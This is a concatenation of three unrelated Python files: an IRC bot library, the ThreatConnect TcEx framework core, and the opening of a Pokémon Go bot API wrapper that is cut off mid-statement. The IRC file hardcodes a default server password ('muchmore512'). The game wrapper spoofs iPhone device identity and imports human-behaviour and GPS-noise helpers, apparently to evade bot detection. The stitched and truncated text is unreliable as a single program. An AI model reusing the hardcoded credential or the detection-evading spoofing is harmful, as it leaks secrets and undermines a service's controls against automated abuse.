# Copyright (C) 1999--2002 Joel Rosdahl # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # Joel Rosdahl <joel@rosdahl.net> # # $Id: ircbot.py,v 1.23 2008/09/11 07:38:30 keltus Exp $ """ircbot -- Simple IRC bot library. This module contains a single-server IRC bot class that can be used to write simpler bots. """ import sys from UserDict import UserDict from irclib import SimpleIRCClient from irclib import nm_to_n, irc_lower, all_events from irclib import parse_channel_modes, is_channel from irclib import ServerConnectionError class SingleServerIRCBot(SimpleIRCClient): """A single-server IRC bot class. The bot tries to reconnect if it is disconnected. The bot keeps track of the channels it has joined, the other clients that are present in the channels and which of those that have operator or voice modes. The "database" is kept in the self.channels attribute, which is an IRCDict of Channels. """ def __init__(self, server_list, nickname, realname, reconnection_interval=60): """Constructor for SingleServerIRCBot objects. Arguments: server_list -- A list of tuples (server, port) that defines which servers the bot should try to connect to. nickname -- The bot's nickname. realname -- The bot's realname. reconnection_interval -- How long the bot should wait before trying to reconnect. dcc_connections -- A list of initiated/accepted DCC connections. 
""" SimpleIRCClient.__init__(self) self.channels = IRCDict() self.server_list = server_list if not reconnection_interval or reconnection_interval < 0: reconnection_interval = 2**31 self.reconnection_interval = reconnection_interval self._nickname = nickname self._realname = realname for i in ["disconnect", "join", "kick", "mode", "namreply", "nick", "part", "quit"]: self.connection.add_global_handler(i, getattr(self, "_on_" + i), -10) def _connected_checker(self): """[Internal]""" if not self.connection.is_connected(): self.connection.execute_delayed(self.reconnection_interval, self._connected_checker) self.jump_server() def _connect(self): """[Internal]""" password = "muchmore512" if len(self.server_list[0]) > 2: password = self.server_list[0][2] try: self.connect(self.server_list[0][0], self.server_list[0][1], self._nickname, password, ircname=self._realname) except ServerConnectionError: pass def _on_disconnect(self, c, e): """[Internal]""" self.channels = IRCDict() self.connection.execute_delayed(self.reconnection_interval, self._connected_checker) def _on_join(self, c, e): """[Internal]""" ch = e.target() nick = nm_to_n(e.source()) if nick == c.get_nickname(): self.channels[ch] = Channel() self.channels[ch].add_user(nick) def _on_kick(self, c, e): """[Internal]""" nick = e.arguments()[0] channel = e.target() if nick == c.get_nickname(): del self.channels[channel] else: self.channels[channel].remove_user(nick) def _on_mode(self, c, e): """[Internal]""" modes = parse_channel_modes(" ".join(e.arguments())) t = e.target() if is_channel(t): ch = self.channels[t] for mode in modes: if mode[0] == "+": f = ch.set_mode else: f = ch.clear_mode f(mode[1], mode[2]) else: # Mode on self... XXX pass def _on_namreply(self, c, e): """[Internal]""" # e.arguments()[0] == "@" for secret channels, # "*" for private channels, # "=" for others (public channels) # e.arguments()[1] == channel # e.arguments()[2] == nick list ch = e.arguments()[1] for nick in e.arguments()[2].split(): if nick[0] == "@": nick = nick[1:] self.channels[ch].set_mode("o", nick) elif nick[0] == "%": nick = nick[1:] self.channels[ch].set_mode("h", nick) elif nick[0] == "+": nick = nick[1:] self.channels[ch].set_mode("v", nick) self.channels[ch].add_user(nick) def _on_nick(self, c, e): """[Internal]""" before = nm_to_n(e.source()) after = e.target() for ch in self.channels.values(): if ch.has_user(before): ch.change_nick(before, after) def _on_part(self, c, e): """[Internal]""" nick = nm_to_n(e.source()) channel = e.target() if nick == c.get_nickname(): del self.channels[channel] else: self.channels[channel].remove_user(nick) def _on_quit(self, c, e): """[Internal]""" nick = nm_to_n(e.source()) for ch in self.channels.values(): if ch.has_user(nick): ch.remove_user(nick) def die(self, msg="Bye, cruel world!"): """Let the bot die. Arguments: msg -- Quit message. """ self.connection.disconnect(msg) sys.exit(0) def disconnect(self, msg="I'll be back!"): """Disconnect the bot. The bot will try to reconnect after a while. Arguments: msg -- Quit message. """ self.connection.disconnect(msg) def get_version(self): """Returns the bot version. Used when answering a CTCP VERSION request. """ return "ircbot.py by Joel Rosdahl <joel@rosdahl.net>" def jump_server(self, msg="Changing servers"): """Connect to a new server, possibly disconnecting from the current. The bot will skip to next server in the server_list each time jump_server is called. 
""" if self.connection.is_connected(): self.connection.disconnect(msg) self.server_list.append(self.server_list.pop(0)) self._connect() def on_ctcp(self, c, e): """Default handler for ctcp events. Replies to VERSION and PING requests and relays DCC requests to the on_dccchat method. """ if e.arguments()[0] == "VERSION": c.ctcp_reply(nm_to_n(e.source()), "VERSION " + self.get_version()) elif e.arguments()[0] == "PING": if len(e.arguments()) > 1: c.ctcp_reply(nm_to_n(e.source()), "PING " + e.arguments()[1]) elif e.arguments()[0] == "DCC" and e.arguments()[1].split(" ", 1)[0] == "CHAT": self.on_dccchat(c, e) def on_dccchat(self, c, e): pass def start(self): """Start the bot.""" self._connect() SimpleIRCClient.start(self) class IRCDict: """A dictionary suitable for storing IRC-related things. Dictionary keys a and b are considered equal if and only if irc_lower(a) == irc_lower(b) Otherwise, it should behave exactly as a normal dictionary. """ def __init__(self, dict=None): self.data = {} self.canon_keys = {} # Canonical keys if dict is not None: self.update(dict) def __repr__(self): return repr(self.data) def __cmp__(self, dict): if isinstance(dict, IRCDict): return cmp(self.data, dict.data) else: return cmp(self.data, dict) def __len__(self): return len(self.data) def __getitem__(self, key): return self.data[self.canon_keys[irc_lower(key)]] def __setitem__(self, key, item): if key in self: del self[key] self.data[key] = item self.canon_keys[irc_lower(key)] = key def __delitem__(self, key): ck = irc_lower(key) del self.data[self.canon_keys[ck]] del self.canon_keys[ck] def __iter__(self): return iter(self.data) def __contains__(self, key): return self.has_key(key) def clear(self): self.data.clear() self.canon_keys.clear() def copy(self): if self.__class__ is UserDict: return UserDict(self.data) import copy return copy.copy(self) def keys(self): return self.data.keys() def items(self): return self.data.items() def values(self): return self.data.values() def has_key(self, key): return irc_lower(key) in self.canon_keys def update(self, dict): for k, v in dict.items(): self.data[k] = v def get(self, key, failobj=None): return self.data.get(key, failobj) class Channel: """A class for keeping information about an IRC channel. This class can be improved a lot. """ def __init__(self): self.userdict = IRCDict() self.operdict = IRCDict() self.halfoperdict = IRCDict() self.voiceddict = IRCDict() self.modes = {} def users(self): """Returns an unsorted list of the channel's users.""" return self.userdict.keys() def opers(self): """Returns an unsorted list of the channel's operators.""" return self.operdict.keys() def halfopers(self): """Returns an unsorted list of the channel's half operators. 
(added)""" return self.halfoperdict.keys() def voiced(self): """Returns an unsorted list of the persons that have voice mode set in the channel.""" return self.voiceddict.keys() def has_user(self, nick): """Check whether the channel has a user.""" return nick in self.userdict def is_oper(self, nick): """Check whether a user has operator status in the channel.""" return nick in self.operdict def is_halfoper(self, nick): """Check whether a user has operator status in the channel.""" return nick in self.halfoperdict def is_voiced(self, nick): """Check whether a user has voice mode set in the channel.""" return nick in self.voiceddict def add_user(self, nick): self.userdict[nick] = 1 def remove_user(self, nick): for d in self.userdict, self.operdict, self.halfoperdict, self.voiceddict: if nick in d: del d[nick] def change_nick(self, before, after): self.userdict[after] = 1 del self.userdict[before] if before in self.operdict: self.operdict[after] = 1 del self.operdict[before] if before in self.halfoperdict: self.halfoperdict[after] = 1 del self.halfoperdict[before] if before in self.voiceddict: self.voiceddict[after] = 1 del self.voiceddict[before] def set_mode(self, mode, value=None): """Set mode on the channel. Arguments: mode -- The mode (a single-character string). value -- Value """ if mode == "o": self.operdict[value] = 1 elif mode == "h": self.halfoperdict[value] = 1 elif mode == "v": self.voiceddict[value] = 1 else: self.modes[mode] = value def clear_mode(self, mode, value=None): """Clear mode on the channel. Arguments: mode -- The mode (a single-character string). value -- Value """ try: if mode == "o": del self.operdict[value] elif mode == "h": del self.halfoperdict[value] elif mode == "v": del self.voiceddict[value] else: del self.modes[mode] except KeyError: pass def has_mode(self, mode): return mode in self.modes def is_moderated(self): return self.has_mode("m") def is_secret(self): return self.has_mode("s") def is_protected(self): return self.has_mode("p") def has_topic_lock(self): return self.has_mode("t") def is_invite_only(self): return self.has_mode("i") def has_allow_external_messages(self): return self.has_mode("n") def has_limit(self): return self.has_mode("l") def limit(self): if self.has_limit(): return self.modes[l] else: return None def has_key(self): return self.has_mode("k") def key(self): if self.has_key(): return self.modes["k"] else: return None
"""TcEx Framework""" # standard library import inspect import logging import os import platform import re import signal import sys import threading from typing import Optional from urllib.parse import quote from .app_config_object import InstallJson from .inputs import Inputs from .logger import Logger from .tokens import Tokens class TcEx: """Provides basic functionality for all types of TxEx Apps. Args: config (dict, kwargs): A dictionary containing configuration items typically used by external Apps. config_file (str, kwargs): A filename containing JSON configuration items typically used by external Apps. logger (logging.Logger, kwargs): An pre-configured instance of logger to use instead of tcex logger. """ def __init__(self, **kwargs): """Initialize Class Properties.""" # catch interupt signals if threading.current_thread().name == 'MainThread': signal.signal(signal.SIGINT, self._signal_handler) if platform.system() != 'Windows': signal.signal(signal.SIGHUP, self._signal_handler) signal.signal(signal.SIGTERM, self._signal_handler) # Property defaults self._config: dict = kwargs.get('config') or {} self._default_args = None self._error_codes = None self._exit_code = 0 self._indicator_associations_types_data = {} self._indicator_types = None self._indicator_types_data = None self._jobs = None self._key_value_store = None self._logger = None self._playbook = None self._redis_client = None self._service = None self._session = None self._session_external = None self._stix_model = None self._utils = None self._ti = None self._token = None self.ij = InstallJson() # add custom logger if provided self._log: object = kwargs.get('logger') # init args (needs logger) self.inputs = Inputs(self, self._config, kwargs.get('config_file')) def _association_types(self): """Retrieve Custom Indicator Associations types from the ThreatConnect API.""" # Dynamically create custom indicator class r: object = self.session.get('/v2/types/associationTypes') # check for bad status code and response that is not JSON if not r.ok or 'application/json' not in r.headers.get('content-type', ''): self.log.warning('feature=tcex, event=association-types-download, status=failure') return # validate successful API results data: dict = r.json() if data.get('status') != 'Success': self.log.warning('feature=tcex, event=association-types-download, status=failure') return try: # Association Type Name is not a unique value at this time, but should be. for association in data.get('data', {}).get('associationType', []): self._indicator_associations_types_data[association.get('name')] = association except Exception as e: self.handle_error(200, [e]) def _signal_handler( self, signal_interupt: int, frame: object # pylint: disable=unused-argument ) -> None: """Handle singal interrupt.""" call_file: str = os.path.basename(inspect.stack()[1][0].f_code.co_filename) call_module: str = inspect.stack()[1][0].f_globals['__name__'].lstrip('Functions.') call_line: int = inspect.stack()[1][0].f_lineno self.log.error( f'App interrupted - file: {call_file}, method: {call_module}, line: {call_line}.' ) if signal_interupt in (2, 15): self.exit(1, 'The App received an interrupt signal and will now exit.') def advanced_request( self, session: object, timeout: Optional[int] = 600, output_prefix: Optional[str] = None ) -> object: """Return instance of AdvancedRequest. Args: session (object): An instance of requests.Session. timeout (int): The number of second before timing out the request. 
Returns: object: An instance of AdvancedRequest """ from .app_feature import AdvancedRequest return AdvancedRequest(session, self, timeout, output_prefix) def aot_rpush(self, exit_code: int) -> None: """Push message to AOT action channel.""" if self.default_args.tc_playbook_db_type == 'Redis': try: self.redis_client.rpush(self.default_args.tc_exit_channel, exit_code) except Exception as e: # pragma: no cover self.exit(1, f'Exception during AOT exit push ({e}).') @property def args(self) -> object: """Argparser args Namespace.""" return self.inputs.args() def batch( self, owner: str, action: Optional[str] = 'Create', attribute_write_type: Optional[str] = 'Replace', halt_on_error: Optional[bool] = False, playbook_triggers_enabled: Optional[bool] = False, ) -> object: """Return instance of Batch Args: tcex: An instance of TcEx object. owner: The ThreatConnect owner for Batch action. action: Action for the batch job ['Create', 'Delete']. attribute_write_type: Write type for TI attributes ['Append', 'Replace']. halt_on_error: If True any batch error will halt the batch job. playbook_triggers_enabled: Deprecated input, will not be used. Returns: object: An instance of the Batch Class. """ from .batch import Batch return Batch( self, owner, action, attribute_write_type, halt_on_error, playbook_triggers_enabled ) def cache( self, domain: str, data_type: str, ttl_seconds: Optional[int] = None, mapping: Optional[dict] = None, ) -> object: """Get instance of the Cache module. Args: domain: The domain can be either "system", "organization", or "local". When using "organization" the data store can be accessed by any Application in the entire org, while "local" access is restricted to the App writing the data. The "system" option should not be used in almost all cases. data_type: The data type descriptor (e.g., tc:whois:cache). ttl_seconds: The number of seconds the cache is valid. mapping: Advanced - The datastore mapping if required. Returns: object: An instance of the Cache Class. """ from .datastore import Cache return Cache(self, domain, data_type, ttl_seconds, mapping) @property def case_management(self) -> object: """Include the Threat Intel Module. .. Note:: Threat Intell methods can be accessed using ``tcex.ti.<method>``. Returns: object: An instance of the CaseManagement Class. """ from .case_management import CaseManagement return CaseManagement(self) @property def cm(self) -> object: """Include the Case Management Module.""" return self.case_management def datastore(self, domain: str, data_type: str, mapping: Optional[dict] = None) -> object: """Get instance of the DataStore module. Args: domain: The domain can be either "system", "organization", or "local". When using "organization" the data store can be accessed by any Application in the entire org, while "local" access is restricted to the App writing the data. The "system" option should not be used in almost all cases. data_type: The data type descriptor (e.g., tc:whois:cache). mapping: ElasticSearch mappings data. Returns: object: An instance of the DataStore Class. 
""" from .datastore import DataStore return DataStore(self, domain, data_type, mapping) @property def default_args(self) -> object: """Argparser args Namespace.""" return self._default_args @property def error_codes(self) -> object: """Return TcEx error codes.""" if self._error_codes is None: from .tcex_error_codes import TcExErrorCodes self._error_codes = TcExErrorCodes() return self._error_codes def exit(self, code: Optional[int] = None, msg: Optional[str] = None) -> None: """Application exit method with proper exit code The method will run the Python standard sys.exit() with the exit code previously defined via :py:meth:`~tcex.tcex.TcEx.exit_code` or provided during the call of this method. Args: code: The exit code value for the app. msg: A message to log and add to message tc output. """ # add exit message to message.tc file and log if msg is not None: if code in [0, 3] or (code is None and self.exit_code in [0, 3]): self.log.info(msg) else: self.log.error(msg) self.message_tc(msg) if code is None: code = self.exit_code elif code in [0, 1, 3]: pass else: self.log.error('Invalid exit code') code = 1 if self.default_args.tc_aot_enabled: # push exit message self.aot_rpush(code) # exit token renewal thread self.token.shutdown = True self.log.info(f'Exit Code: {code}') sys.exit(code) @property def exit_code(self) -> None: """Return the current exit code.""" return self._exit_code @exit_code.setter def exit_code(self, code: int) -> None: """Set the App exit code. For TC Exchange Apps there are 3 supported exit codes. * 0 indicates a normal exit * 1 indicates a failure during execution * 3 indicates a partial failure Args: code (int): The exit code value for the app. """ if code is not None and code in [0, 1, 3]: self._exit_code = code else: self.log.warning('Invalid exit code') @staticmethod def expand_indicators(indicator: str) -> list: """Process indicators expanding file hashes/custom indicators into multiple entries. Args: indicator: An " : " delimited string. Returns: (list): a list of indicators split on " : ". """ if indicator.count(' : ') > 0: # handle all multi-valued indicators types (file hashes and custom indicators) indicator_list = [] # group 1 - lazy capture everything to first <space>:<space> or end of line iregx_pattern = r'^(.*?(?=\s\:\s|$))?' iregx_pattern += r'(?:\s\:\s)?' # remove <space>:<space> # group 2 - look behind for <space>:<space>, lazy capture everything # to look ahead (optional <space>):<space> or end of line iregx_pattern += r'((?<=\s\:\s).*?(?=(?:\s)?\:\s|$))?' iregx_pattern += r'(?:(?:\s)?\:\s)?' # remove (optional <space>):<space> # group 3 - look behind for <space>:<space>, lazy capture everything # to look ahead end of line iregx_pattern += r'((?<=\s\:\s).*?(?=$))?$' iregx = re.compile(iregx_pattern) indicators = iregx.search(indicator) if indicators is not None: indicator_list = list(indicators.groups()) else: # handle all single valued indicator types (address, host, etc) indicator_list = [indicator] return indicator_list @property def group_types(self) -> list: """Return all defined ThreatConnect Group types. Returns: (list): A list of ThreatConnect Group types. 
""" return [ 'Adversary', 'Campaign', 'Document', 'Email', 'Event', 'Incident', 'Intrusion Set', 'Signature', 'Report', 'Threat', 'Task', ] @property def group_types_data(self) -> dict: """Return supported ThreatConnect Group types.""" return { 'Adversary': {'apiBranch': 'adversaries', 'apiEntity': 'adversary'}, 'Campaign': {'apiBranch': 'campaigns', 'apiEntity': 'campaign'}, 'Document': {'apiBranch': 'documents', 'apiEntity': 'document'}, 'Email': {'apiBranch': 'emails', 'apiEntity': 'email'}, 'Event': {'apiBranch': 'events', 'apiEntity': 'event'}, 'Incident': {'apiBranch': 'incidents', 'apiEntity': 'incident'}, 'Intrusion Set': {'apiBranch': 'intrusionSets', 'apiEntity': 'intrusionSet'}, 'Report': {'apiBranch': 'reports', 'apiEntity': 'report'}, 'Signature': {'apiBranch': 'signatures', 'apiEntity': 'signature'}, 'Threat': {'apiBranch': 'threats', 'apiEntity': 'threat'}, 'Task': {'apiBranch': 'tasks', 'apiEntity': 'task'}, } def get_type_from_api_entity(self, api_entity: dict) -> Optional[str]: """Return the object type as a string given a api entity. Args: api_entity: A TCEntity object. Returns: str, None: The type value or None. """ merged = self.group_types_data.copy() merged.update(self.indicator_types_data) for key, value in merged.items(): if value.get('apiEntity') == api_entity: return key return None def handle_error( self, code: int, message_values: Optional[list] = None, raise_error: Optional[bool] = True ) -> None: """Raise RuntimeError Args: code: The error code from API or SDK. message: The error message from API or SDK. raise_error: Raise a Runtime error. Defaults to True. Raises: RuntimeError: Raised a defined error. """ try: if message_values is None: message_values = [] message = self.error_codes.message(code).format(*message_values) self.log.error(f'Error code: {code}, {message}') except AttributeError: self.log.error(f'Incorrect error code provided ({code}).') raise RuntimeError(100, 'Generic Failure, see logs for more details.') except IndexError: self.log.error( f'Incorrect message values provided for error code {code} ({message_values}).' ) raise RuntimeError(100, 'Generic Failure, see logs for more details.') if raise_error: raise RuntimeError(code, message) @property def indicator_associations_types_data(self) -> dict: """Return ThreatConnect associations type data. Retrieve the data from the API if it hasn't already been retrieved. Returns: (dict): A dictionary of ThreatConnect associations types. """ if not self._indicator_associations_types_data: self._association_types() # load custom indicator associations return self._indicator_associations_types_data @property def indicator_types(self) -> list: """Return ThreatConnect Indicator types. Retrieve the data from the API if it hasn't already been retrieved. Returns: (list): A list of ThreatConnect Indicator types. """ if not self._indicator_types: self._indicator_types = self.indicator_types_data.keys() return self._indicator_types @property def indicator_types_data(self) -> dict: """Return ThreatConnect indicator types data. Retrieve the data from the API if it hasn't already been retrieved. Returns: (dict): A dictionary of ThreatConnect Indicator data. 
""" if not self._indicator_types_data: self._indicator_types_data = {} # retrieve data from API r = self.session.get('/v2/types/indicatorTypes') # TODO: use handle error instead if not r.ok: raise RuntimeError('Could not retrieve indicator types from ThreatConnect API.') for itd in r.json().get('data', {}).get('indicatorType'): self._indicator_types_data[itd.get('name')] = itd return self._indicator_types_data @property def key_value_store(self) -> object: """Return the correct KV store for this execution. The TCKeyValueAPI KV store is limited to two operations (create and read), while the Redis kvstore wraps a few other Redis methods. """ if self._key_value_store is None: if self.default_args.tc_playbook_db_type == 'Redis': from .key_value_store import KeyValueRedis self._key_value_store = KeyValueRedis(self.redis_client) elif self.default_args.tc_playbook_db_type == 'TCKeyValueAPI': from .key_value_store import KeyValueApi # providing runtime_level to KeyValueApi for service Apps so that the new # API endpoint (in TC 6.0.7) can be used with the context. this new # endpoint could be used for PB Apps, however to support versions of # TC < 6.0.7 the old endpoint must still be used. self._key_value_store = KeyValueApi(self.session, self.ij.runtime_level.lower()) else: # pragma: no cover raise RuntimeError(f'Invalid DB Type: ({self.default_args.tc_playbook_db_type})') return self._key_value_store @property def log(self) -> object: """Return a valid logger.""" if self._log is None: self._log = self.logger.log return self._log @log.setter def log(self, log: object) -> None: """Return a valid logger.""" if isinstance(log, logging.Logger): self._log = log @property def logger(self) -> object: """Return logger.""" if self._logger is None: logger_name = self._config.get('tc_logger_name', 'tcex') self._logger = Logger(self, logger_name) self._logger.add_cache_handler('cache') return self._logger def metric( self, name: str, description: str, data_type: str, interval: str, keyed: Optional[bool] = False, ) -> object: """Get instance of the Metrics module. Args: name: The name for the metric. description: The description of the metric. data_type: The type of metric: Sum, Count, Min, Max, First, Last, and Average. interval: The metric interval: Hourly, Daily, Weekly, Monthly, and Yearly. keyed: Indicates whether the data will have a keyed value. Returns: (object): An instance of the Metrics Class. """ from .metrics import Metrics return Metrics(self, name, description, data_type, interval, keyed) def message_tc(self, message: str, max_length: Optional[int] = 255) -> None: """Write data to message_tc file in TcEX specified directory. This method is used to set and exit message in the ThreatConnect Platform. ThreatConnect only supports files of max_message_length. Any data exceeding this limit will be truncated. The last <max_length> characters will be preserved. Args: message: The message to add to message_tc file max_length: The maximum length of an exit message. Defaults to 255. 
""" if not isinstance(message, str): message = str(message) if os.access(self.default_args.tc_out_path, os.W_OK): message_file = os.path.join(self.default_args.tc_out_path, 'message.tc') else: message_file = 'message.tc' if os.path.isfile(message_file): with open(message_file) as mh: message = mh.read() + message if not message.endswith('\n'): message += '\n' with open(message_file, 'w') as mh: # write last <max_length> characters to file mh.write(message[-max_length:]) def notification(self) -> object: """Get instance of the Notification module. Returns: (object): An instance of the Notification Class. """ from .notifications import Notifications return Notifications(self) @property def parser(self) -> object: """Instance tcex args parser.""" return self.inputs.parser def pb(self, context: str, output_variables: list) -> object: """Return a new instance of playbook module. Args: context: The Redis context for Playbook or Service Apps. output_variables: A list of requested PB/Service output variables. Returns: tcex.playbook.Playbooks: An instance of Playbooks """ from .playbooks import Playbooks return Playbooks(self, context, output_variables) @property def playbook(self) -> object: """Return an instance of Playbooks module. This property defaults context and outputvariables to arg values. .. Note:: Playbook methods can be accessed using ``tcex.playbook.<method>``. Returns: tcex.playbook.Playbooks: An instance of Playbooks """ if self._playbook is None: # handle outputs coming in as a csv string and list outputs: list = self.default_args.tc_playbook_out_variables or [] if isinstance(outputs, str): outputs = outputs.split(',') self._playbook: object = self.pb(self.default_args.tc_playbook_db_context, outputs) return self._playbook @property def proxies(self) -> dict: """Format the proxy configuration for Python Requests module. Generates a dictionary for use with the Python Requests module format when proxy is required for remote connections. **Example Response** :: {"http": "http://user:pass@10.10.1.10:3128/"} Returns: (dict): Dictionary of proxy settings """ proxies = {} if ( self.default_args.tc_proxy_host is not None and self.default_args.tc_proxy_port is not None ): if ( self.default_args.tc_proxy_username is not None and self.default_args.tc_proxy_password is not None ): tc_proxy_username = quote(self.default_args.tc_proxy_username, safe='~') tc_proxy_password = quote(self.default_args.tc_proxy_password, safe='~') # proxy url with auth proxy_url = ( f'{tc_proxy_username}:{tc_proxy_password}' f'@{self.default_args.tc_proxy_host}:{self.default_args.tc_proxy_port}' ) else: # proxy url without auth proxy_url = f'{self.default_args.tc_proxy_host}:{self.default_args.tc_proxy_port}' proxies = {'http': f'http://{proxy_url}', 'https': f'http://{proxy_url}'} return proxies @property def rargs(self) -> object: """Return argparser args Namespace with Playbook args automatically resolved.""" return self.inputs.resolved_args() @staticmethod def rc(host, port, db=0, blocking=False, **kwargs) -> object: """Return a *new* instance of Redis client. For a full list of kwargs see https://redis-py.readthedocs.io/en/latest/#redis.Connection. Args: host (str, optional): The REDIS host. Defaults to localhost. port (int, optional): The REDIS port. Defaults to 6379. db (int, optional): The REDIS db. Defaults to 0. blocking_pool (bool): Use BlockingConnectionPool instead of ConnectionPool. errors (str, kwargs): The REDIS errors policy (e.g. strict). 
max_connections (int, kwargs): The maximum number of connections to REDIS. password (str, kwargs): The REDIS password. socket_timeout (int, kwargs): The REDIS socket timeout. timeout (int, kwargs): The REDIS Blocking Connection Pool timeout value. Returns: Redis.client: An instance of redis client. """ from .key_value_store import RedisClient return RedisClient(host=host, port=port, db=db, blocking=blocking, **kwargs).client @property def redis_client(self) -> object: """Return redis client instance configure for Playbook/Service Apps.""" if self._redis_client is None: from .key_value_store import RedisClient self._redis_client = RedisClient( host=self.default_args.tc_playbook_db_path, port=self.default_args.tc_playbook_db_port, db=0, ).client return self._redis_client def results_tc(self, key: str, value: str) -> None: """Write data to results_tc file in TcEX specified directory. The TcEx platform support persistent values between executions of the App. This method will store the values for TC to read and put into the Database. Args: key: The data key to be stored. value: The data value to be stored. """ if os.access(self.default_args.tc_out_path, os.W_OK): results_file = f'{self.default_args.tc_out_path}/results.tc' else: results_file = 'results.tc' new = True open(results_file, 'a').close() # ensure file exists with open(results_file, 'r+') as fh: results = '' for line in fh.read().strip().split('\n'): if not line: continue try: k, v = line.split(' = ') except ValueError: # handle null/empty value (e.g., "name =") k, v = line.split(' =') if k == key: v = value new = False if v is not None: results += f'{k} = {v}\n' if new and value is not None: # indicates the key/value pair didn't already exist results += f'{key} = {value}\n' fh.seek(0) fh.write(results) fh.truncate() @staticmethod def safe_indicator(indicator: str) -> str: """Format indicator value for safe HTTP request. Args: indicator: Indicator to URL Encode Returns: (str): The urlencoded string """ if indicator is not None: indicator = quote(indicator, safe='~') return indicator @staticmethod def safe_rt(resource_type: str, lower: Optional[bool] = False) -> str: """Format the Resource Type. Takes Custom Indicator types with a space character and return a *safe* string. (e.g. *User Agent* is converted to User_Agent or user_agent.) Args: resource_type: The resource type to format. lower: Return type in all lower case Returns: (str): The formatted resource type. """ if resource_type is not None: resource_type = resource_type.replace(' ', '_') if lower: resource_type = resource_type.lower() return resource_type @staticmethod def safe_group_name( group_name: str, group_max_length: Optional[int] = 100, ellipsis: Optional[bool] = True ): """Truncate group name to match limit breaking on space and optionally add an ellipsis. .. note:: Currently the ThreatConnect group name limit is 100 characters. Args: group_name: The raw group name to be truncated. group_max_length: The max length of the group name. ellipsis: If true the truncated name will have '...' appended. Returns: (str): The truncated group name with optional ellipsis. """ ellipsis_value = '' if ellipsis: ellipsis_value = ' ...' 
if group_name is not None and len(group_name) > group_max_length: # split name by spaces and reset group_name group_name_array = group_name.split(' ') group_name = '' for word in group_name_array: word = f'{word}' if (len(group_name) + len(word) + len(ellipsis_value)) >= group_max_length: group_name = f'{group_name}{ellipsis_value}' group_name = group_name.lstrip(' ') break group_name += f' {word}' return group_name @staticmethod def safe_tag(tag: str) -> str: """Encode and truncate tag to match limit (128 characters) of ThreatConnect API. Args: tag: The tag to be truncated Returns: (str): The truncated and quoted tag. """ if tag is not None: tag = quote(tag[:128], safe='~') return tag @staticmethod def safe_url(url: str) -> str: """Encode value for safe HTTP request. Args: url (str): The string to URL Encode. Returns: (str): The urlencoded string. """ if url is not None: url: str = quote(url, safe='~') return url @property def service(self) -> object: """Include the Service Module. .. Note:: Service methods can be accessed using ``tcex.service.<method>``. """ if self._service is None: if self.ij.runtime_level.lower() == 'apiservice': from .services import ApiService as Service elif self.ij.runtime_level.lower() == 'triggerservice': from .services import CommonServiceTrigger as Service elif self.ij.runtime_level.lower() == 'webhooktriggerservice': from .services import WebhookTriggerService as Service else: self.exit(1, 'Could not determine the service type.') self._service = Service(self) return self._service @property def session(self) -> object: """Return an instance of Requests Session configured for the ThreatConnect API.""" if self._session is None: from .sessions import TcSession self._session = TcSession( logger=self.log, api_access_id=self.default_args.api_access_id, api_secret_key=self.default_args.api_secret_key, base_url=self.default_args.tc_api_path, ) # set verify self._session.verify = self.default_args.tc_verify # set token self._session.token = self.token # update User-Agent self._session.headers.update( {'User-Agent': f'TcEx: {__import__(__name__).__version__}'} ) # add proxy support if requested if self.default_args.tc_proxy_tc: self._session.proxies = self.proxies self.log.info( f'Using proxy host {self.args.tc_proxy_host}:' f'{self.args.tc_proxy_port} for ThreatConnect session.' ) # enable curl logging if tc_log_curl param is set. if self.default_args.tc_log_curl: self._session.log_curl = True return self._session @property def session_external(self) -> object: """Return an instance of Requests Session configured for the ThreatConnect API.""" if self._session_external is None: from .sessions import ExternalSession self._session_external = ExternalSession(logger=self.log) # add User-Agent to headers self._session_external.headers.update( {'User-Agent': f'TcEx App: {self.ij.display_name} - {self.ij.program_version}'} ) # add proxy support if requested if self.default_args.tc_proxy_external: self._session_external.proxies = self.proxies self.log.info( f'Using proxy host {self.args.tc_proxy_host}:' f'{self.args.tc_proxy_port} for external session.' ) if self.default_args.tc_log_curl: self._session_external.log_curl = True return self._session_external @property def stix_model(self) -> object: """Include the Threat Intel Module. .. Note:: Threat Intell methods can be accessed using ``tcex.ti.<method>``. 
""" if self._stix_model is None: from .stix import StixModel self._stix_model = StixModel(self.logger) return self._stix_model @property def ti(self) -> object: """Include the Threat Intel Module. .. Note:: Threat Intell methods can be accessed using ``tcex.ti.<method>``. """ if self._ti is None: from .threat_intelligence import ThreatIntelligence self._ti = ThreatIntelligence(self) return self._ti @property def token(self) -> object: """Return token object.""" if self._token is None: sleep_interval = int(os.getenv('TC_TOKEN_SLEEP_INTERVAL', '30')) self._token = Tokens( self.default_args.tc_api_path, sleep_interval, self.default_args.tc_verify, self.log ) return self._token @property def utils(self) -> object: """Include the Utils module. .. Note:: Utils methods can be accessed using ``tcex.utils.<method>``. """ if self._utils is None: from .utils import Utils self._utils = Utils(temp_path=self.default_args.tc_temp_path) return self._utils @property def victim_asset_types(self) -> list: """Return all defined ThreatConnect Asset types. Returns: (list): A list of ThreatConnect Asset types. """ return [ 'EmailAddress', 'SocialNetwork', 'NetworkAccount', 'WebSite', 'Phone', ]
from __future__ import absolute_import import time import logging import random, base64, struct import hashlib import os import urllib import sys from pgoapi.exceptions import (ServerSideRequestThrottlingException, NotLoggedInException, ServerBusyOrOfflineException, NoPlayerPositionSetException, HashingOfflineException, UnexpectedResponseException) from pgoapi.pgoapi import PGoApi from pgoapi.pgoapi import PGoApiRequest from pgoapi.pgoapi import RpcApi from pgoapi.protos.pogoprotos.networking.requests.request_type_pb2 import RequestType from pgoapi.utilities import get_time from .human_behaviour import sleep, gps_noise_rng from pokemongo_bot.base_dir import _base_dir class PermaBannedException(Exception): pass class ApiWrapper(PGoApi, object): DEVICE_ID = None def __init__(self, config=None): self.config = config self.gen_device_id() device_info = { "device_id": ApiWrapper.DEVICE_ID, "device_brand": 'Apple', "device_model": 'iPhone', "device_model_boot": 'iPhone8,2', "hardware_manufacturer": 'Apple', "hardware_model": 'N66AP', "firmware_brand": 'iPhone OS', "firmware_type": '9.3.3' } PGoApi.__init__(self, device_info=device_info) if not self.config.hashkey is None: PGoApi.activate_hash_server(self,self.config.hashkey) # Set to default, just for CI... self.actual_lat, self.actual_lng, 